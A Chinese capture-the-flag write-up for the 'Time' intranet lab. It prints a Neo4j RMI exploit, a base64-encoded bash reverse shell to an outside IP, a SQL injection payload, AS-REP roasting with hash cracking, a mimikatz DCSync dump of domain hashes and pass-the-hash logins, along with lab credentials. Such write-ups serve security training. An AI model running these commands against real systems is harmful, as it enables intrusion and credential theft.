Time

春秋云镜 —-time

Time是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。

flag01

首先使用fscan扫描,发现开放7687端口

image-20240505002114610

用户名、密码,neo4j,neo4j

image-20240505002143296

利用

扫出来有个Neo4j Browser,存在nday(https://github.com/zwjjustdoit/CVE-2021-34371.jar),弹个shell到自己vps上

1
java -jar .\rhino_gadget.jar rmi://39.101.174.164:1337 "curl k3fgjw.dnslog.cn"

image-20240505002339978

dnslog成功获取

image-20240505002452942

反弹shell

bash64编码

1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTkuMjkuOTYuMTcvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}

使用nc或msf的通用模块进行监听

image-20240505002618265

msf成功拿到监听(这里就不演示nc拿到shell的截图了)

image-20240505002632755

1
拿到主机的内网ip为:172.22.6.36

输入命令

1
cat /home/neo4j/flag01.txt

image-20240505002657574

1
flag01: flag{7b45c82d-5876-4b1f-b1de-1b862fe1aecc}

flag02

环境存在python环境

image-20240505002740764

如果需要挂上代理需要到meterpreter中去执行(添加路由后,才能挂socks5代理)

shell转meterpreter

思路:

  • 使用shell_to_meterpreter模块
  • 使用msf生成python版本的meterpreter执行(因为环境有python模块)

上传fscan到主机

思路:

  • 利用envs.sh上传,下载,给权限
  • 利用msf的upload,(如果超时,记得修改默认时间)
  • 可以利用领导的一句话扫描内网的命令

下载,给权限

1
curl https://envs.sh/FhP.bin -o fscan

image-20240505003413720

扫描内网

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
neo4j@ubuntu:~$ ./fscan -h 172.22.6.0/24
./fscan -h 172.22.6.0/24

___                              _

  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.3
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.6.12     is alive
(icmp) Target 172.22.6.38     is alive   
(icmp) Target 172.22.6.36     is alive   
(icmp) Target 172.22.6.25     is alive   
[*] Icmp alive hosts len is: 4



172.22.6.25:445 open
172.22.6.12:445 open
172.22.6.25:139 open
172.22.6.12:139 open
172.22.6.25:135 open
172.22.6.12:135 open
172.22.6.36:22 open
172.22.6.38:80 open
172.22.6.38:22 open
172.22.6.12:88 open
172.22.6.36:7687 open
[*] alive ports len is: 11
start vulscan
[*] NetInfo 
[*]172.22.6.12
   [->]DC-PROGAME
   [->]172.22.6.12
[*] NetBios 172.22.6.25     XIAORANG\WIN2019              
[*] OsInfo 172.22.6.12	(Windows Server 2016 Datacenter 14393)
[*] NetInfo 
[*]172.22.6.25
   [->]WIN2019
   [->]172.22.6.25
[*] NetBios 172.22.6.12     [+] DC:DC-PROGAME.xiaorang.lab       Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.6.38        code:200 len:1531   title:后台登录
[*] WebTitle https://172.22.6.36:7687  code:400 len:50     title:None

发现内网中存在一个主机有后登录

http://172.22.6.38

image-20240505003437548

加单引号卡住,尝试sqlmap跑注入

image-20240505003448256

在admin发现有sql注入,payload有

1
2
3
http://172.22.6.38/index.php
POST:
username=admin' UNION ALL SELECT NULL,CONCAT(0x7162627a71,JSON_ARRAYAGG(CONCAT_WS(0x746e70776669,schema_name)),0x717a787071),NULL FROM INFORMATION_SCHEMA.SCHEMATA-- -&password=admin123

如何想要使用burp suite抓包,需要配置burp suite代理即可(拿到数据后,再保存到txt中,使用sqlmal跑数据)

1
2
3
4
5
这里直接使用网上的payload的数据包,尝试

http://172.22.6.38/index.php
POST:
username=admin' UNION ALL SELECT NULL,CONCAT(0x7162627a71,JSON_ARRAYAGG(CONCAT_WS(0x746e70776669,schema_name)),0x717a787071),NULL FROM INFORMATION_SCHEMA.SCHEMATA-- -&password=admin123

直接sqlmap一把梭哈,发现存在时间盲注,再爆破–current-db,table

img

img

img

1
flag{b142f5ce-d9b8-4b73-9012-ad7517ba029}

flag03

把user表中的用户名收集成字典user.txt,将下面命令生成csv粘贴到user.txt里

1
proxychains sqlmap -r kkk.txt --dump -D oa_db -T oa_users -C email
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
chenyan
tanggui
buning
beishu
shushi
fuyi
pangcheng
tonghao
jiaoshan
dulun
kejuan
gexin
lugu
guzaicheng
feicai
ranqun
zhouyi
shishu
yanyun
chengqiu
louyou
maqun
wenbiao
weishengshan
zhangxin
chuyuan
wenliang
yulvxue
luyue
ganjian
pangzhen
guohong
lezhong
sheweiyue
dujian
lidongjin
hongqun
yexing
maoda
qiaomei
nongzhen
dongshu
zhuzhu
jiyun
qiguanrou
yixue
chujun
shenshan
lefen
yubo
helianrui
xuanqun
shangjun
huguang
wansifu
fenghong
wanyan
diyan
xiangyu
songyan
fandi
xiangjuan
beirui
didi
zhubin
lingchun
zhenglu
xundi
wansishun
yezongyue
bianmei
shanshao
zhenhui
chengli
yufen
jiyi
panbao
mennane
fengsi
mingyan
luoyou
liangduanqing
nongyan
haolun
oulun
weichipeng
qidiaofang
xuehe
chensi
guihui
fuyue
wangxing
zhengxiao
guhui
baoai
hangzhao
xingye
qianyi
xionghong
zouqi
rongbiao
gongxin
luxing
huayan
duyue
xijun
daiqing
yingbiao
hengteng
changwu
chengying
luhong
tongxue
xiangqian
shaokang
nongzhu
haomei
maoqing
xiai
bihe
gaoli
jianggong
pangning
ruishi
wuhuan
qiaode
mayong
hangda
changlu
liuyuan
chenggu
shentuyun
zhuangsong
chushao
heli
haoming
xieyi
shangjie
situxin
linxi
zoufu
qianqing
qiai
ruilin
luomeng
huaren
yanyangmei
zuofen
manyuan
yuhui
sunli
guansixin
ruisong
qiruo
jinyu
shoujuan
yanqian
changyun
hualu
huanming
baoshao
hongmei
manyun
changwan
wangyan
shijian
ruibei
jingshao
jinzhi
yuhui
zangpeng
changyun
yetai
luoxue
moqian
xupeng
ruanyong
guliangxian
yinbin
huarui
niuya
guwei
qinguan
yangdanhan
yingjun
weiwan
sunduangu
sisiwu
nongyan
xuanlu
yunzhong
gengfei
zizhuansong
ganbailong
shenjiao
zangyao
yangdanhe
chengliang
xudi
wulun
yuling
taoya
jinle
youchao
liangduanzhi
jiagupiao
ganze
jiangqing
jinshan
zhengpubei
cuicheng
qiyong
qizhu
ganjian
yurui
feishu
chenxin
shengzhe
wohong
manzhi
xiangdong
weihui
xingquan
miaoshu
gongwan
qijie
shaoting
xiqi
jinghong
qianyou
chuhua
yanyue
huangjia
zhouchun
jiyu
wendong
heyuan
mazhen
shouchun
liuzhe
fengbo
taigongyuan
gesheng
songming
yuwan
diaowei
youyi
rongxianyu
fuyi
linli
weixue
hejuan
zuoqiutai
siyi
shenshan
tongdong

保存为user.txt,然后枚举未设置预认证的账户(这个东西默认是不关闭的,但是当关闭了预身份认证后,攻击者可以使用指定用户域控制器的kerberos 88端口请求票据,此时域控不会进行任何验证就将TGT和该用户Hash加密的Login Session Key 返回。因此,攻击者就可以对获取到的用户Hash加密的 Login Session Key 进行离线破解,如果字典够强大,则可能破解得到该指定用户的明文密码)

1
proxychains python3 GetNPUsers.py -dc-ip 172.22.6.12 -usersfile user.txt xiaorang.lab/

如果命令出错误

1
TypeError: deprecated() got an unexpected keyword argument 'name'

删除pyOpenSSL库删了就正常了

1
sudo python3 -m pip uninstall pyOpenSSL

image-20240505004711493

1
$krb5asrep$23$zhangxin@XIAORANG.LAB:e414f4692a6b1d0905e8ed118747ac6e$95ec406c7cdae081a496fe8009a23e684f0612d0632c903e1b34ce66275421c5d0f8125c8e651bf93ddee83bab492833c6af3316177096000e7e302359774ab66f05c254ad9c61ba9407756681e532c031f65961571469d15a08a069ea0ab26d38d876c2808055c0724c9b30dcc29ba9e62d56d8f697ea29d200f3c58bd107e8f39e16d34aa76dcb26d58e7d7e59a1d3160d249451a73fe6ba1a0d09d4a5210f2b6aeb09cf979a0ad51345244b21769878652f5c88223c4ed6648c650413bc31192e835cf74f274b20604a8e9ad3db6ec6e28f7b24452eaf7c456a7e4282e1bba9ffddc43915cfd1349c56a0

解一下

1
hashcat -m 18200 1.txt -a 0 ./rockyou.txt  --force

或者

1
hashcat -m 18200 --force -a 0 '$krb5asrep$23$zhangxin@XIAORANG.LAB:e414f4692a6b1d0905e8ed118747ac6e$95ec406c7cdae081a496fe8009a23e684f0612d0632c903e1b34ce66275421c5d0f8125c8e651bf93ddee83bab492833c6af3316177096000e7e302359774ab66f05c254ad9c61ba9407756681e532c031f65961571469d15a08a069ea0ab26d38d876c2808055c0724c9b30dcc29ba9e62d56d8f697ea29d200f3c58bd107e8f39e16d34aa76dcb26d58e7d7e59a1d3160d249451a73fe6ba1a0d09d4a5210f2b6aeb09cf979a0ad51345244b21769878652f5c88223c4ed6648c650413bc31192e835cf74f274b20604a8e9ad3db6ec6e28f7b24452eaf7c456a7e4282e1bba9ffddc43915cfd1349c56a0' /usr/share/wordlists/rockyou.txt

获得账户和密码

1
zhangxin@XIAORANG.LAB:strawberry

rdp随便试试,登录了172.22.6.25,然后查看一下用户

img

看别人wp说这里有理由怀疑是开了Windows 自动登录,我也不懂,呵呵,反正可以抓密码了

1
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

img

1
2
3
DefaultUserName    REG_SZ    yuxuan
DefaultPassword    REG_SZ    Yuxuan7QbrgZ3L
DefaultDomainName    REG_SZ    xiaorang.lab

换这个账户登录,用BloodHound分析域内关系,发现这个用户滥用了SID历史功能(SIDHistory是一个为支持域迁移方案而设置的属性,当一个对象从一个域迁移到另一个域时,会在新域创建一个新的SID作为作为该对象的objectSid,在之前域中的SID会添加该对象的SIDHistory属性中,此时该对象将保留在原来域的SID对应的访问权限

img

我们就可以通过这个滥用直接攻击DC了,因为我们保留域管理员的访问权限了,所以直接dump哈希

1
mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"

img

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
1103    shuzhen 07c1f387d7c2cf37e0ca7827393d2327
1104    gaiyong 52c909941c823dbe0f635b3711234d2e
1106    xiqidi  a55d27cfa25f3df92ad558c304292f2e
1107    wengbang        6b1d97a5a68c6c6c9233d11274d13a2e
1108    xuanjiang       a72a28c1a29ddf6509b8eabc61117c6c
1109    yuanchang       e1cea038f5c9ffd9dc323daf35f6843b
1110    lvhui   f58b31ef5da3fc831b4060552285ca54
1111    wenbo   9abb7115997ea03785e92542f684bdde
1112    zhenjun 94c84ba39c3ece24b419ab39fdd3de1a
1113    jinqing 4bf6ad7a2e9580bc8f19323f96749b3a
1115    yangju  1fa8c6b4307149415f5a1baffebe61cf
1117    weicheng        796a774eace67c159a65d6b86fea1d01
1118    weixian 8bd7dc83d84b3128bfbaf165bf292990
1119    haobei  045cc095cc91ba703c46aa9f9ce93df1
1120    jizhen  1840c5130e290816b55b4e5b60df10da
1121    jingze  3c8acaecc72f63a4be945ec6f4d6eeee
1122    rubao   d8bd6484a344214d7e0cfee0fa76df74
1123    zhaoxiu 694c5c0ec86269daefff4dd611305fab
1124    tangshun        90b8d8b2146db6456d92a4a133eae225
1125    liangliang      c67cd4bae75b82738e155df9dedab7c1
1126    qiyue   b723d29e23f00c42d97dd97cc6b04bc8
1127    chouqian        c6f0585b35de1862f324bc33c920328d
1128    jicheng 159ee55f1626f393de119946663a633c
1129    xiyi    ee146df96b366efaeb5138832a75603b
1130    beijin  a587b90ce9b675c9acf28826106d1d1d
1131    chenghui        08224236f9ddd68a51a794482b0e58b5
1132    chebin  b50adfe07d0cef27ddabd4276b3c3168
1133    pengyuan        a35d8f3c986ab37496896cbaa6cdfe3e
1134    yanglang        91c5550806405ee4d6f4521ba6e38f22
1135    jihuan  cbe4d79f6264b71a48946c3fa94443f5
1136    duanmuxiao      494cc0e2e20d934647b2395d0a102fb0
1137    hongzhi f815bf5a1a17878b1438773dba555b8b
1138    gaijin  b1040198d43631279a63b7fbc4c403af
1139    yifu    4836347be16e6af2cd746d3f934bb55a
1140    fusong  adca7ec7f6ab1d2c60eb60f7dca81be7
1141    luwan   c5b2b25ab76401f554f7e1e98d277a6a
1142    tangrong        2a38158c55abe6f6fe4b447fbc1a3e74
1143    zhufeng 71e03af8648921a3487a56e4bb8b5f53
1145    dongcheng       f2fdf39c9ff94e24cf185a00bf0a186d
1146    lianhuangchen   23dc8b3e465c94577aa8a11a83c001af
1147    lili    b290a36500f7e39beee8a29851a9f8d5
1148    huabi   02fe5838de111f9920e5e3bb7e009f2f
1149    rangsibo        103d0f70dc056939e431f9d2f604683c
1150    wohua   cfcc49ec89dd76ba87019ca26e5f7a50
1151    haoguang        33efa30e6b3261d30a71ce397c779fda
1152    langying        52a8a125cd369ab16a385f3fcadc757d
1153    diaocai a14954d5307d74cd75089514ccca097a
1154    lianggui        4ae2996c7c15449689280dfaec6f2c37
1155    manxue  0255c42d9f960475f5ad03e0fee88589
1156    baqin   327f2a711e582db21d9dd6d08f7bdf91
1157    chengqiu        0d0c1421edf07323c1eb4f5665b5cb6d
1158    louyou  a97ba112b411a3bfe140c941528a4648
1159    maqun   485c35105375e0754a852cee996ed33b
1160    wenbiao 36b6c466ea34b2c70500e0bfb98e68bc
1161    weishengshan    f60a4233d03a2b03a7f0ae619c732fae
1163    chuyuan 0cfdca5c210c918b11e96661de82948a
1164    wenliang        a4d2bacaf220292d5fdf9e89b3513a5c
1165    yulvxue cf970dea0689db62a43b272e2c99dccd
1166    luyue   274d823e941fc51f84ea323e22d5a8c4
1167    ganjian 7d3c39d94a272c6e1e2ffca927925ecc
1168    pangzhen        51d37e14983a43a6a45add0ae8939609
1169    guohong d3ce91810c1f004c782fe77c90f9deb6
1170    lezhong dad3990f640ccec92cf99f3b7be092c7
1171    sheweiyue       d17aecec7aa3a6f4a1e8d8b7c2163b35
1172    dujian  8f7846c78f03bf55685a697fe20b0857
1173    lidongjin       34638b8589d235dea49e2153ae89f2a1
1174    hongqun 6c791ef38d72505baeb4a391de05b6e1
1175    yexing  34842d36248c2492a5c9a1ae5d850d54
1176    maoda   6e65c0796f05c0118fbaa8d9f1309026
1177    qiaomei 6a889f350a0ebc15cf9306687da3fd34
502     krbtgt  a4206b127773884e2c7ea86cdd282d9c
1178    wenshao b31c6aa5660d6e87ee046b1bb5d0ff79
500     Administrator   04d93ffd6f5f6e4490e0de23f240a5e9
1000    DC-PROGAME$     5c76d177587a06495af3a7494ffb2e1f
1180    yuxuan  376ece347142d1628632d440530e8eed
1181    WIN2019$        91c31e8e8aa3270652c7e1e11fa17b3b
1179    zhangxin        d6c5976e07cdb410be19b84126367e3d

直接把域管理员哈希dump了,所以相当于已经拿下域控了,哈希传递登一下其他两台机器拿一下flag就结束了

1
proxychains impacket-wmiexec  XIAORANG/administrator@172.22.6.25   -hashes :04d93ffd6f5f6e4490e0de23f240a5e9
1
type C:\Users\Administrator\flag\flag*

img


flag04

1
proxychains impacket-wmiexec  XIAORANG/administrator@172.22.6.12   -hashes :04d93ffd6f5f6e4490e0de23f240a5e9
1
type C:\Users\Administrator\flag\flag*

img

知识点

AS-REP Roasting

​ 未设置预认证的账户(这个东西默认是不关闭的,但是当关闭了预身份认证后,攻击者可以使用指定用户域控制器的kerberos 88端口请求票据,此时域控不会进行任何验证就将TGT和该用户Hash加密的Login Session Key 返回。因此,攻击者就可以对获取到的用户Hash加密的 Login Session Key 进行离线破解,如果字典够强大,则可能破解得到该指定用户的明文密码)


SID历史功能滥用

​ 滥用了SID历史功能(SIDHistory是一个为支持域迁移方案而设置的属性,当一个对象从一个域迁移到另一个域时,会在新域创建一个新的SID作为作为该对象的objectSid,在之前域中的SID会添加该对象的SIDHistory属性中,此时该对象将保留在原来域的SID对应的访问权限